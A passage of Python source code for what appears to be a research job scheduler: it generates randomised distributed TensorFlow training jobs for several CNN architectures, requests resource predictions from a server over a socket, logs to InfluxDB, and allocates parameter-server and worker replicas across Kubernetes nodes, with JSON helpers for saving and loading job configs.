num_layer1=num_layer1, num_layer2=num_layer2, num_layer3=num_layer3,
num_layer4=num_layer4,
num_layer5=num_layer5
)
job_config = {'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval, 'task_id': job.task_id,
'rtimes': job.rtimes,
'tag': job.tag, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4, 'channel5': job.channel5,
'num_layer1': job.num_layer1, 'num_layer2': job.num_layer2,
'num_layer3': job.num_layer3,
'num_layer4': job.num_layer4,
'num_layer5': job.num_layer5}
dict = {'batch': batch, 'channel1': channel1, 'channel2': channel2, 'channel3': channel3,
'channel4': channel4,
'channel5': channel5, 'num_layer1': num_layer1, 'num_layer2': num_layer2,
'num_layer3': num_layer3, 'num_layer4': num_layer4, 'num_layer5': num_layer5}
elif template_id == 2:
bottle = random.randint(0, 1)
channels = [24, 32, 40, 48, 64, 72, 80, 96, 120, 128, 160, 192, 240, 256, 320, 384, 400, 480,
512,
576]
x1 = random.randint(0, 3)
x2 = random.randint(1, 7)
x3 = random.randint(8, 14)
x4 = random.randint(14, 19)
channel1 = channels[x1]
channel2 = channels[x2]
channel3 = channels[x3]
channel4 = channels[x4]
layer1 = random.randint(2, 6)
layer2 = random.randint(2, 8)
layer3 = random.randint(2, 40)
layer4 = random.randint(2, 6)
job = RESTask(template_id=template_id, ps_replicas=ps_r,
worker_replicas=worker_r,
training_step=tasks['training_step'][template_id - 1],
batch_size=batch,
interval=tasks['interval'][template_id - 1],
task_id=tasks['task_id'][template_id - 1],
rtimes=tasks['rtimes'][template_id - 1],
tag=tasks['tag'][template_id - 1], bottle=bottle, layer1=layer1, layer2=layer2,
layer3=layer3,
layer4=layer4, channel1=channel1, channel2=channel2, channel3=channel3,
channel4=channel4)
job_config = {'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval,
'task_id': job.task_id, 'rtimes': job.rtimes,
'tag': job.tag, 'bottle': job.bottle, 'layer1': job.layer1, 'layer2': job.layer2,
'layer3': job.layer3,
'layer4': job.layer4, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3, 'channel4': job.channel4}
dict = {'batch': batch, 'channel1': channel1, 'channel2': channel2, 'channel3': channel3,
'channel4': channel4,
'layer1': layer1, 'layer2': layer2,
'layer3': layer3, 'layer4': layer4, 'bottle': bottle}
elif template_id == 3:
stack = random.randint(3, 16)
channels = [12, 16, 24, 32, 40, 48, 64, 72, 80, 96, 120, 128, 160, 192, 240, 256, 320, 384, 400,
480,
512, 576]
x1 = random.randint(0, 3)
x2 = random.randint(2, 5)
x3 = random.randint(6, 11)
x4 = random.randint(6, 11)
channel1 = channels[x1]
channel2 = channels[x2]
channel3 = channels[x3]
channel4 = channels[x4]
job = RETask(template_id=template_id, ps_replicas=ps_r,
worker_replicas=worker_r,
training_step=tasks['training_step'][template_id - 1],
batch_size=batch,
interval=tasks['interval'][template_id - 1],
task_id=tasks['task_id'][template_id - 1], rtimes=tasks['rtimes'][template_id - 1],
tag=tasks['tag'][template_id - 1], stack=stack, channel1=channel1,
channel2=channel2,
channel3=channel3, channel4=channel4
)
dict = {'batch': batch, 'channel1': channel1, 'channel2': channel2, 'channel3': channel3,
'channel4': channel4, 'stack_num': stack}
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas, 'training_step': job.training_step,
'batch_size': job.batch_size, 'interval': job.interval,
'task_id': job.task_id, 'rtimes': job.rtimes,
'tag': job.tag, 'stack': job.stack, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3, 'channel4': job.channel4
}
elif template_id == 4:
repeat = random.randint(4, 12)
channels = [12, 16, 24, 32, 40, 48, 64, 72, 80, 96, 120, 128, 160, 192, 240, 256, 320, 384, 400,
480,
512, 576, 640, 728, 856, 920, 960, 1024, 1280, 1408, 1536, 1600, 1728, 2048, 2096]
x1 = random.randint(0, 5)
x2 = random.randint(3, 9)
x3 = random.randint(9, 12)
x4 = random.randint(12, 18)
x5 = random.randint(19, 24)
x6 = random.randint(26, 28)
x7 = random.randint(29, 31)
x8 = random.randint(32, 34)
channel1 = channels[x1]
channel2 = channels[x2]
channel3 = channels[x3]
channel4 = channels[x4]
channel5 = channels[x5]
channel6 = channels[x6]
channel7 = channels[x7]
channel8 = channels[x8]
job = XCETask(template_id=template_id, ps_replicas=ps_r,
worker_replicas=worker_r,
training_step=tasks['training_step'][template_id - 1],
batch_size=batch,
interval=tasks['interval'][template_id - 1],
task_id=tasks['task_id'][template_id - 1],
rtimes=tasks['rtimes'][template_id - 1], tag=tasks['tag'][template_id - 1],
repeat=repeat,
channel1=channel1, channel2=channel2, channel3=channel3,
channel4=channel4, channel5=channel5, channel6=channel6, channel7=channel7,
channel8=channel8)
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval,
'task_id': job.task_id,
'rtimes': job.rtimes, 'tag': job.tag, 'repeat': job.repeat, 'channel1': job.channel1,
'channel2': job.channel2, 'channel3': job.channel3, 'channel4': job.channel4,
'channel5': job.channel5,
'channel6': job.channel6, 'channel7': job.channel7, 'channel8': job.channel8
}
dict = {'batch': batch, 'channel1': channel1, 'channel2': channel2, 'channel3': channel3,
'channel4': channel4, 'channel5': channel5, 'channel6': channel6, 'channel7': channel7,
'channel8': channel8, 'repeat': repeat}
else:
Ls = [16, 32, 40, 48, 50, 60, 64, 80, 100, 120, 128, 160, 180, 200, 240, 250, 256]
ks = [8, 10, 12, 16, 24, 32, 40, 48]
x1 = random.randint(0, 16)
x2 = random.randint(0, 7)
L = Ls[x1]
k = ks[x2]
BC = random.randint(0, 1)
job = DENTask(template_id=template_id, ps_replicas=ps_r,
worker_replicas=worker_r,
training_step=tasks['training_step'][template_id - 1],
batch_size=batch,
interval=tasks['interval'][template_id - 1],
task_id=tasks['task_id'][template_id - 1],
rtimes=tasks['rtimes'][template_id - 1],
tag=tasks['tag'][template_id - 1], L=L, k=k, BC=BC)
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas, 'training_step': job.training_step,
'batch_size': job.batch_size, 'interval': job.interval, 'task_id': job.task_id,
'rtimes': job.rtimes,
'tag': job.tag, 'L': job.L, 'k': job.k, 'BC': job.BC
}
# batch, flops, params = denfpmodel.denfp(batch=256, BC=0, k=24, L=100, num_classes=10)
dict = {'batch': batch, 'BC': BC, 'k': k, 'L': L, 'num_classes': 10}
measure = job.measure
lock.acquire()
# tmp_reload = tasks['reload']
# tmp_reload = tmp_reload+1
# tasks['reload'] = tmp_reload
tasks['base'] = job.name
lock.release()
else:
job_base_name = tasks['base']
job_base_name_list = job_base_name.split('-')
if job_base_name_list[0] == 'vgg':
template_id = 1
elif job_base_name_list[0] == 'res':
template_id = 2
elif job_base_name_list[0] == 're':
template_id = 3
elif job_base_name_list[0] == 'xception':
template_id = 4
else:
template_id = 5
lock.acquire()
tmp1 = tasks['task_id']
tmp1[template_id - 1] += 1
tasks['task_id'] = tmp1
tmp2 = tasks['rtimes']
tmp2[template_id - 1] += 1
tasks['rtimes'] = tmp2
# tasks['ps_replicas'][template_id - 1] = random.randint(1, 3)
# tasks['worker_replicas'][template_id - 1] = random.randint(2, 6)
# tasks['batch_size'][template_id - 1] = random.randint(128, 1024)
lock.release()
tmp_task_id = tmp1[template_id - 1]
job = reload_jobs(job_base_name, task_id=tmp_task_id)
if template_id == 1:
job_config = {'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval, 'task_id': job.task_id,
'rtimes': job.rtimes,
'tag': job.tag, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4, 'channel5': job.channel5,
'num_layer1': job.num_layer1, 'num_layer2': job.num_layer2,
'num_layer3': job.num_layer3,
'num_layer4': job.num_layer4,
'num_layer5': job.num_layer5}
dict = {'batch': job.batch_size, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4,
'channel5': job.channel5, 'num_layer1': job.num_layer1, 'num_layer2': job.num_layer2,
'num_layer3': job.num_layer3, 'num_layer4': job.num_layer4,
'num_layer5': job.num_layer5}
elif template_id == 2:
job_config = {'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval,
'task_id': job.task_id, 'rtimes': job.rtimes,
'tag': job.tag, 'bottle': job.bottle, 'layer1': job.layer1, 'layer2': job.layer2,
'layer3': job.layer3,
'layer4': job.layer4, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3, 'channel4': job.channel4}
dict = {'batch': job.batch_size, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4,
'layer1': job.layer1, 'layer2': job.layer2,
'layer3': job.layer3, 'layer4': job.layer4, 'bottle': job.bottle}
elif template_id == 3:
dict = {'batch': job.batch_size, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4, 'stack_num': job.stack}
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas, 'training_step': job.training_step,
'batch_size': job.batch_size, 'interval': job.interval,
'task_id': job.task_id, 'rtimes': job.rtimes,
'tag': job.tag, 'stack': job.stack, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3, 'channel4': job.channel4
}
elif template_id == 4:
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas,
'training_step': job.training_step,
'batch_size': job.batch_size,
'interval': job.interval,
'task_id': job.task_id,
'rtimes': job.rtimes, 'tag': job.tag, 'repeat': job.repeat, 'channel1': job.channel1,
'channel2': job.channel2, 'channel3': job.channel3, 'channel4': job.channel4,
'channel5': job.channel5,
'channel6': job.channel6, 'channel7': job.channel7, 'channel8': job.channel8
}
dict = {'batch': job.batch_size, 'channel1': job.channel1, 'channel2': job.channel2,
'channel3': job.channel3,
'channel4': job.channel4, 'channel5': job.channel5, 'channel6': job.channel6,
'channel7': job.channel7,
'channel8': job.channel8, 'repeat': job.repeat}
else:
job_config = {
'template_id': job.template_id, 'ps_replicas': job.ps_replicas,
'worker_replicas': job.worker_replicas, 'training_step': job.training_step,
'batch_size': job.batch_size, 'interval': job.interval, 'task_id': job.task_id,
'rtimes': job.rtimes,
'tag': job.tag, 'L': job.L, 'k': job.k, 'BC': job.BC
}
# batch, flops, params = denfpmodel.denfp(batch=256, BC=0, k=24, L=100, num_classes=10)
dict = {'batch': job.batch_size, 'BC': job.BC, 'k': job.k, 'L': job.L, 'num_classes': 10}
measure = job.measure
lock.acquire()
if tasks['count'] < tasks['size'] or tasks['buffercount'] < max_buffer_size:
#loss_client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#loss_client.connect(ADDR)
client_pre = influxdb.InfluxDBClient(host=job.dbhost, port=8086, username='admin', password='admin',
database="PREDICT")
pre_list = measure.split(" ")
measure_s = pre_list[0] + 'S' + pre_list[-1]
measure_t = pre_list[0] + 'T' + pre_list[-1]
step_items = [
{
'measurement': measure_t,
'tags': {
'task': job.task_id,
'runtimes': job.rtimes,
'retry': job.retry
},
'fields': {
'training_step': job.training_step
}
}
]
# print(step_to_train)
client_pre.write_points(step_items, time_precision="ms", database="PREDICT")
# if job.training_step > 200:
loss_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
loss_client.connect(ADDR)
loss_client.send(bytes(measure, 'utf-8'))
connect_try = 5
try_times = 1
connected = False
while True:
if try_times > connect_try:
break
msg_from_server = loss_client.recv(4096)
if not msg_from_server:
break
msg_from_server_str = str(msg_from_server.decode('utf-8'))
msg_from_server_list = msg_from_server_str.split(" ")
if msg_from_server_list[0] == '400':
connected = True
break
loss_client.send(bytes(measure, 'utf-8'))
try_times = try_times + 1
if not connected:
print("Connected or send message error!")
loss_client.close()
continue
print(msg_from_server_str)
print("connected success!")
dict_json = json.dumps(dict)
loss_client.send(bytes(dict_json, 'utf-8'))
ress = loss_client.recv(4096)
ress_str = str(ress.decode('utf-8'))
ress_lists = ress_str.split(' ')
if ress_lists[0] == '400':
batch_res = int(ress_lists[1])
flops_res = int(ress_lists[2])
params_res = int(ress_lists[3])
cpu_predict = float(ress_lists[-2])
cpu_base = math.ceil(1.12*cpu_predict)
mem_predict = float(ress_lists[-1])
mem_base = math.ceil(1.35*mem_predict)
res_to_server = '1'
loss_client.send(bytes(res_to_server, 'utf-8'))
else:
res_to_server = '0'
loss_client.send(bytes(res_to_server, 'utf-8'))
loss_client.close()
continue
loss_client.close()
# lock.acquire()
tmp_reload = tasks['reload']
# lock.release()
if tmp_reload == 0:
alpha = 1
beta = 1
else:
alpha = random.randint(2,12)*0.1+0.5
beta = random.randint(0,10)*0.1+1
# alpha = 1
# beta = 1
job.set_resource(cpu_source=(math.ceil(cpu_base * alpha)), mem_source=(math.ceil(mem_base * beta)))
start_time = '%.3f' % time.time()
start_time = float(start_time)
job.set_deadline(deadline=deadline, start_time=start_time)
job_res_config = {'deadline': job.deadline, 'start_time': job.starttime, 'cpu_source': job.cpu_allocate,
'mem_source': job.memory_allocate, 'cpu_high': cpu_base, 'memory_base': mem_base,'batch_res': batch_res,
'flops_res': flops_res, 'params_res': params_res,'step_base':0}
save_config_dir = task_submit.check_path(job.name)
save_job_path = '/tfdata/k8snfs/%s/%s.json' % (job.name, job.name)
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job.name, job.name)
save_config(job_config, save_job_path)
save_config(job_res_config, save_res_path)
if tasks['count'] < tasks['size'] and tasks['buffercount'] == 0:
node_index, cpu_nodes, memory_nodes, total_cpu_use, total_mem_use = job_basic.schedule_base()
cpu_value, mem_value, cpu_node_value, mem_node_value = get_load_value(node_index=node_index,
cpu_base=cpu_nodes,
memory_base=memory_nodes,
total_cpu_base=total_cpu_use,
total_memory_base=total_mem_use)
if cpu_value < 0.4:
job.worker_replicas = random.randint(4,6)
elif cpu_value < 0.7:
job.worker_replicas = random.randint(3, 4)
else:
job.worker_replicas = random.randint(1,2)
job.ps_replicas = random.randint(math.ceil(job.worker_replicas / 4),
math.ceil(job.worker_replicas / 2))
save_job_change_layout(job.name,job.ps_replicas,job.worker_replicas)
mem_need = job.total_mem*total_mem_use + job.worker_replicas*job.memory_allocate+2048*job.ps_replicas
cpu_need = job.total_cpu*total_cpu_use+job.worker_replicas*job.cpu_allocate+1000*job.ps_replicas
catch_worker = 0
catch_ps = 0
node_keys = cpu_nodes.keys()
reach_ps = False
reach_worker = False
for key in node_keys:
catch_ps_c = 0
catch_ps_m = 0
catch_worker_c = 0
catch_worker_m = 0
can_use_cpu = job.node_cpu[key]*(1-cpu_nodes[key])
can_use_mem = job.node_memory[key] * (1 - memory_nodes[key])
first_try = True
endcpu = False
endmem = False
while (not endcpu) or (not endmem):
if first_try:
if can_use_cpu - 1000 > 0 and not reach_ps:
catch_ps_c+=1
can_use_cpu = can_use_cpu - 1000
else:
if can_use_cpu - job.cpu_allocate > 0 and not reach_worker:
catch_worker_c+=1
can_use_cpu = can_use_cpu - job.cpu_allocate
if can_use_mem - 2048 > 0 and not reach_ps:
catch_ps_m+=1
can_use_mem = can_use_mem - 2048
else:
if can_use_mem - job.memory_allocate > 0 and not reach_worker:
catch_worker_m+=1
can_use_mem = can_use_mem - job.memory_allocate
first_try = False
else:
if can_use_cpu - job.cpu_allocate > 0 and not reach_worker:
catch_worker_c += 1
can_use_cpu = can_use_cpu - job.cpu_allocate
else:
if can_use_cpu - 1000 > 0 and not reach_ps:
catch_ps_c += 1
can_use_cpu = can_use_cpu - 1000
else:
endcpu = True
if can_use_mem - job.memory_allocate > 0 and not reach_worker:
catch_worker_m += 1
can_use_mem = can_use_mem - job.memory_allocate
else:
if can_use_mem - 2048 > 0 and not reach_ps:
catch_ps_m += 1
can_use_mem = can_use_mem - 2048
else:
endmem = True
if catch_worker_c < catch_worker_m:
catch_worker += catch_worker_c
else:
catch_worker += catch_worker_m
if catch_ps_c < catch_ps_m:
catch_ps += catch_ps_c
else:
catch_ps += catch_ps_m
if catch_ps >= job.ps_replicas:
reach_ps = True
if catch_worker >= job.worker_replicas:
reach_worker = True
if catch_ps >= job.ps_replicas and catch_worker >= job.worker_replicas:
break
print("catch_ps: %d catch_worker: %d" % (catch_ps,catch_worker))
if catch_ps < job.ps_replicas or catch_worker < job.worker_replicas:
if catch_ps >0 and catch_worker > 0:
if catch_worker > job.worker_replicas:
catch_worker = job.worker_replicas
if catch_ps > job.ps_replicas:
catch_ps = job.ps_replicas
job.ps_replicas = catch_ps
job.worker_replicas = catch_worker
save_job_change_layout(job.name,catch_ps,catch_worker)
job.create_tf()
ns_tmp = tasks['ns']
ns_tmp.append(job.name)
tasks['ns'] = ns_tmp
# job_tmp = tasks['job']
# job_tmp[job.name] = job
# tasks['job'] = job_tmp
is_layout = tasks['nslayout']
is_layout[job.name] = False
tasks['nslayout'] = is_layout
jobs.append(job.name)
tasks['count'] += 1
pool.apply_async(catch_node_step_msg,
args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res, 1))
else:
job.ps_replicas = 1
job.worker_replicas = 1
save_job_change_layout(job.name, 1, 1)
tasks['next'] = job.name
# tasks['next'] = job.name
else:
job.create_tf()
ns_tmp = tasks['ns']
ns_tmp.append(job.name)
tasks['ns'] = ns_tmp
# job_tmp = tasks['job']
# job_tmp[job.name] = job
# tasks['job'] = job_tmp
is_layout = tasks['nslayout']
is_layout[job.name] = False
tasks['nslayout'] = is_layout
jobs.append(job.name)
tasks['count'] += 1
pool.apply_async(catch_node_step_msg,
args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res, 1))
elif tasks['count'] >= tasks['size']:
worker_buffer = tasks['buffer']
worker_buffer.append(job.name)
tasks['buffer'] = worker_buffer
tmp_buffer_count = tasks['buffercount']
tmp_buffer_count = tmp_buffer_count+1
tasks['buffercount'] = tmp_buffer_count
else:
worker_buffer = tasks['buffer']
worker_buffer.append(job.name)
tmp_buffer_count = tasks['buffercount']
tmp_buffer_count = tmp_buffer_count + 1
tasks['buffercount'] = tmp_buffer_count
node_index, cpu_nodes, memory_nodes, total_cpu_use, total_mem_use = job_basic.schedule_base()
cpu_value, mem_value, cpu_node_value, mem_node_value = get_load_value(node_index=node_index,cpu_base=cpu_nodes,memory_base=memory_nodes,total_cpu_base=total_cpu_use,total_memory_base=total_mem_use)
if cpu_value < 0.4:
selected = False
for job_name in worker_buffer:
rea = max_free_heap.add(job_name)
if rea is not None:
selected_job_name = rea
selected = True
break
if not selected:
selected_job_name = max_free_heap.items[0]
print(selected_job_name)
worker_buffer = max_free_heap.items
print(worker_buffer)
if not selected:
ceshi_name = worker_buffer.pop(0)
# tmp_buffer = tasks['buffer']
# tmp_buffer.remove(selected_job_name)
print(ceshi_name)
tasks['buffer'] = worker_buffer[:]
# tmp_buffer_size =
max_free_heap.clear()
if selected:
tasks['buffercount'] = max_buffer_size
else:
tmp_buffer_count = tmp_buffer_count - 1
tasks['buffercount'] = tmp_buffer_count
else:
selected = False
for job_name in worker_buffer:
# max_wight_heap
rea = max_wight_heap.add(job_name)
if rea is not None:
selected_job_name = rea
selected = True
break
if not selected:
selected_job_name = max_wight_heap.items[0]
worker_buffer = max_wight_heap.items
print(worker_buffer)
print(selected_job_name)
if not selected:
ceshi_name = worker_buffer.pop(0)
# tmp_buffer = tasks['buffer']
# tmp_buffer.remove(selected_job_name)
print(ceshi_name)
tasks['buffer'] = worker_buffer[:]
# tmp_buffer_size =
max_wight_heap.clear()
if selected:
tasks['buffercount'] = max_buffer_size
else:
tmp_buffer_count = tmp_buffer_count - 1
tasks['buffercount'] = tmp_buffer_count
job = reload_jobs(selected_job_name, -1)
if cpu_value < 0.4:
job.worker_replicas = random.randint(4, 6)
elif cpu_value < 0.7:
job.worker_replicas = random.randint(3, 4)
else:
job.worker_replicas = random.randint(1, 2)
job.ps_replicas = random.randint(math.ceil(job.worker_replicas / 4),
math.ceil(job.worker_replicas / 2))
save_job_change_layout(job.name, job.ps_replicas, job.worker_replicas)
mem_need = job.total_mem * total_mem_use + job.worker_replicas * job.memory_allocate + 2048 * job.ps_replicas
cpu_need = job.total_cpu * total_cpu_use + job.worker_replicas * job.cpu_allocate + 1000 * job.ps_replicas
catch_worker = 0
catch_ps = 0
node_keys = cpu_nodes.keys()
reach_ps = False
reach_worker = False
for key in node_keys:
catch_ps_c = 0
catch_ps_m = 0
catch_worker_c = 0
catch_worker_m = 0
can_use_cpu = job.node_cpu[key] * (1 - cpu_nodes[key])
can_use_mem = job.node_memory[key] * (1 - memory_nodes[key])
first_try = True
endcpu = False
endmem = False
while (not endcpu) or (not endmem):
if first_try:
if can_use_cpu - 1000 > 0 and not reach_ps:
catch_ps_c += 1
can_use_cpu = can_use_cpu - 1000
else:
if can_use_cpu - job.cpu_allocate > 0 and not reach_worker:
catch_worker_c += 1
can_use_cpu = can_use_cpu - job.cpu_allocate
if can_use_mem - 2048 > 0 and not reach_ps:
catch_ps_m += 1
can_use_mem = can_use_mem - 2048
else:
if can_use_mem - job.memory_allocate > 0 and not reach_worker:
catch_worker_m += 1
can_use_mem = can_use_mem - job.memory_allocate
first_try = False
else:
if can_use_cpu - job.cpu_allocate > 0 and not reach_worker:
catch_worker_c += 1
can_use_cpu = can_use_cpu - job.cpu_allocate
else:
if can_use_cpu - 1000 > 0 and not reach_ps:
catch_ps_c += 1
can_use_cpu = can_use_cpu - 1000
else:
endcpu = True
if can_use_mem - job.memory_allocate > 0 and not reach_worker:
catch_worker_m += 1
can_use_mem = can_use_mem - job.memory_allocate
else:
if can_use_mem - 2048 > 0 and not reach_ps:
catch_ps_m += 1
can_use_mem = can_use_mem - 2048
else:
endmem = True
if catch_worker_c < catch_worker_m:
catch_worker += catch_worker_c
else:
catch_worker += catch_worker_m
if catch_ps_c < catch_ps_m:
catch_ps += catch_ps_c
else:
catch_ps += catch_ps_m
if catch_ps >= job.ps_replicas:
reach_ps = True
if catch_worker >= job.worker_replicas:
reach_worker = True
if catch_ps >= job.ps_replicas and catch_worker >= job.worker_replicas:
break
print("catch_ps: %d catch_worker: %d" % (catch_ps, catch_worker))
if catch_ps < job.ps_replicas or catch_worker < job.worker_replicas:
if catch_ps > 0 and catch_worker > 0:
if catch_worker > job.worker_replicas:
catch_worker = job.worker_replicas
if catch_ps > job.ps_replicas:
catch_ps = job.ps_replicas
job.ps_replicas = catch_ps
job.worker_replicas = catch_worker
save_job_change_layout(job.name, catch_ps, catch_worker)
job.create_tf()
ns_tmp = tasks['ns']
ns_tmp.append(job.name)
tasks['ns'] = ns_tmp
# job_tmp = tasks['job']
# job_tmp[job.name] = job
# tasks['job'] = job_tmp
is_layout = tasks['nslayout']
is_layout[job.name] = False
tasks['nslayout'] = is_layout
jobs.append(job.name)
tasks['count'] += 1
pool.apply_async(catch_node_step_msg,
args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res, 1))
else:
job.ps_replicas = 1
job.worker_replicas = 1
save_job_change_layout(job.name,1,1)
tasks['next'] = job.name
else:
job.create_tf()
ns_tmp = tasks['ns']
ns_tmp.append(job.name)
tasks['ns'] = ns_tmp
# job_tmp = tasks['job']
# job_tmp[job.name] = job
# tasks['job'] = job_tmp
is_layout = tasks['nslayout']
is_layout[job.name] = False
tasks['nslayout'] = is_layout
jobs.append(job.name)
tasks['count'] += 1
pool.apply_async(catch_node_step_msg,
args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res, 1))
tmp_reload = tasks['reload']
tmp_reload = tmp_reload + 1
if tmp_reload == 6:
tmp_reload = 0
tasks['reload'] = tmp_reload
# ns_tmp = tasks['ns']
# ns_tmp.append(job.name)
# tasks['ns'] = ns_tmp
# # job_tmp = tasks['job']
# # job_tmp[job.name] = job
# # tasks['job'] = job_tmp
# is_layout = tasks['nslayout']
# is_layout[job.name] = False
# tasks['nslayout'] = is_layout
# jobs.append(job.name)
# tasks['count'] += 1
# pool.apply_async(catch_node_step_msg,args=(jobs, job.name, tasks, lock, batch_res, flops_res, params_res,1))
lock.release()
def save_config(config,filename):
config_content = {}
for key,value in config.items():
# if key != 'job' and key != 'ns':
config_content[key] = value
# task_content['task_id'] = tasks['task_id']
fw = open(filename, 'w', encoding='utf-8')
    # ensure_ascii defaults to True, which escapes any non-ASCII characters in the dict as
    # \uXXXX; setting it to False keeps them human-readable in the output file.
    dic_json = json.dumps(config_content, ensure_ascii=False, indent=4)  # serialise the dict to a JSON string
fw.write(dic_json)
fw.close()
def jiance(tasks,lock):
while True:
if tasks['start']==True:
time.sleep(120)
lock.acquire()
save_config(tasks,'system_info.json')
lock.release()
print('saved configs')
time.sleep(120)
else:
break
def save_job_change_layout(job_name,ps_n,worker_n):
save_job_path = '/tfdata/k8snfs/%s/%s.json' % (job_name, job_name)
job_config = load_config(save_job_path)
# 'ps_replicas': job.ps_replicas,'worker_replicas': job.worker_replicas
job_config['ps_replicas'] = ps_n
job_config['worker_replicas'] = worker_n
save_config(job_config, save_job_path)
def save_job_change_resource(job_name,cpu_allocate,mem_allocate):
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job_name, job_name)
job_res_config = load_config(save_res_path)
# save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job.name, job.name)
# save_config(job_config, save_job_path)
job_res_config['cpu_source'] = cpu_allocate
job_res_config['mem_source'] = mem_allocate
save_config(job_res_config, save_res_path)
def read_step_base(job_name):
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job_name, job_name)
job_res_config = load_config(save_res_path)
key = job_res_config.keys()
key_list = list(key)
if 'step_base' not in key_list:
job_res_config['step_base'] = 0
step_base = job_res_config['step_base']
return int(step_base)
def write_step_base(job_name,step_base):
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job_name, job_name)
job_res_config = load_config(save_res_path)
job_res_config['step_base'] = step_base
save_config(job_res_config,save_res_path)
print("save step base successfully!!!")
def reload_jobs(job_name,task_id):
#full_flie_name = '/tfdata/tfcnn/expjob/%s.yaml' % job_name
save_job_path = '/tfdata/k8snfs/%s/%s.json' % (job_name, job_name)
save_res_path = '/tfdata/k8snfs/%s/%s_res.json' % (job_name, job_name)
# with open(full_flie_name,'r') as yaml_job:
#job_obj = yaml.load(yaml_job.read())
job_config = load_config(save_job_path)
job_res_config = load_config(save_res_path)
params_dic = {}
keys = job_config.keys()
for key in keys:
params_dic[key] = job_config[key]
# params_dic['v1'] = v1
if task_id != -1:
params_dic['task_id'] = task_id
params_dic['rtimes'] = task_id
if job_config['template_id'] == 1:
job_reload = VGGTask(**params_dic)
elif job_config['template_id'] == 2:
job_reload = RESTask(**params_dic)
elif job_config['template_id'] == 3:
job_reload = RETask(**params_dic)
elif job_config['template_id'] == 4:
job_reload = XCETask(**params_dic)
else:
job_reload = DENTask(**params_dic)
# job_reload.template = job_obj
#job_res_config = {'deadline':job.deadline,'start_time':job.starttime,'cpu_source':job.cpu_allocate,
# 'mem_source':job.memory_allocate,'cpu_high':cpu_base}
job_reload.cpu_allocate = job_res_config['cpu_source']
job_reload.memory_allocate = job_res_config['mem_source']
job_reload.deadline = job_res_config['deadline']
job_reload.starttime = job_res_config['start_time']
return job_reload
# job_name_list = job_name.split('-')
# job = VGGTask()
def load_config(config_file):
    # # A JSON document is just a string, e.g.:
    # f = open('product.json', encoding='utf-8')
    # res = f.read()
    # product_dic = json.loads(res)  # parse the JSON string into Python data (string input only)
    # print(product_dic)
    # print(product_dic['iphone'])
    # # t = json.load(f)
    # # print(t)  # json.load takes a file object and parses the file's JSON contents directly
    # # print(t['iphone'])
    # f.close()
f = open(config_file,encoding='utf-8')
res = f.read()
config_content = json.loads(res)
return config_content
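# Round-trip sketch for the two JSON helpers (file name is hypothetical):
#   save_config({'count': 0, 'ns': []}, '/tfdata/k8snfs/demo.json')
#   cfg = load_config('/tfdata/k8snfs/demo.json')   # -> {'count': 0, 'ns': []}
# save_config serialises with ensure_ascii=False, so non-ASCII values stay readable,
# and load_config simply reads the file back and json.loads the contents.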
if __name__ == '__main__':
kubernetes.config.load_kube_config()
v1 = kubernetes.client.CoreV1Api()
# v1.list_node()
mgr = multiprocessing.Manager()
tasks = mgr.dict()
lock = mgr.Lock()
jobs = mgr.list()
config_content = load_config('system_info.json')
for key,value in config_content.items():
tasks[key] = value
print(tasks)
for ns in tasks["ns"]:
# job_reload = reload_jobs(ns,-1)
jobs.append(ns)
# tasks['ns'] = []
# tasks['job'] = {}
q = multiprocessing.Manager().Queue(maxsize=tasks['size'])
tasks['start'] = True
# print(tasks)
# print(type(tasks))
# task_content = {}
# task_content['task_id'] = [0,0,0,0,0]
# task_content['rtimes'] = [0,0,0,0,0]
# task_content['size'] = 3
# task_content['training_step'] = [80,80,80,80,80]
# task_content['ps_replicas'] = [2, 2, 2, 2, 2]
# task_content['count'] = 0
# task_content['worker_replicas'] = [4, 4, 4, 4, 4]
# task_content['training_step'] = [80, 80, 80, 80, 80]
# task_content['interval'] = [1.0, 1.0, 1.0, 0.5, 1.0]
# task_content['batch_size'] = [128, 128, 128, 128, 128]
# task_content['tag'] = ["ms", "ms", "ms", "ms", "ms"]
# save_config(task_content)
# print(tasks.items())
# print(type(tasks['task_id']))
# task_content['task_id'] = tasks['task_id']
